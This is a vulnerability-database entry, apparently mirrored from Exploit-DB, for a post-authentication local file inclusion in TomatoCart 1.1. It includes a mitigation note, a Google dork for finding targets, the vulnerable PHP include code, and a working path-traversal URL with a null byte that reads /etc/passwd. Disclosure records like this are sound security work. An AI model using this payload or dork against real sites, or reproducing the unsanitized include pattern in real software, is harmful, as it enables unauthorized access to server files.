TomatoCart 1.1 PostAuth Local File Include

vendor:

TomatoCart

by:

brain[pillow]

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: TomatoCart

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2010

TomatoCart 1.1 PostAuth Local File Include

The vulnerability allows an attacker to include local files by manipulating the 'pdf' parameter in the '/pdf.php' script. By specifying a relative path to a file, the attacker can read sensitive information, such as the '/etc/passwd' file.

Mitigation:

Apply the vendor-provided patch or upgrade to a newer version that addresses the vulnerability. Restrict access to the vulnerable script and sanitize user input to prevent directory traversal attacks.

Source

Exploit-DB raw data:

# Exploit Title: TomatoCart 1.1 PostAuth Local File Include
# Google Dork: "Powered by TomatoCart"
# Date: 25.10.2010
# Author: brain[pillow]
# Software Link: http://www.tomatocart.com/
# Version: 1.1

=========================================================
# Vuln. code:

 if ($osC_Customer->isLoggedOn() === true) { 
   
    if (isset($_REQUEST['module'])) { 
      $module = $_REQUEST['module']; 
      $osC_Language->load($module); 
    }  
     
    if (isset($_REQUEST['pdf'])) { 
      $pdf = $_REQUEST['pdf']; 
    }  
     
    if (!empty($module) && !empty($pdf)) { 

   
      if (file_exists('includes/modules/pdf/' . $pdf . '.php')) { 
        include('includes/modules/pdf/' . $pdf . '.php'); 
         
        $pdf_class = 'toC_' .ucfirst($pdf) . '_PDF'; 
        $object = new $pdf_class(); 
        $object ->render(); 
         
        exit; 
      } 
    } 
  } 

=========================================================
# Exploit:

/pdf.php?module=1&pdf=../../../../../../../../../../../../../etc/passwd%00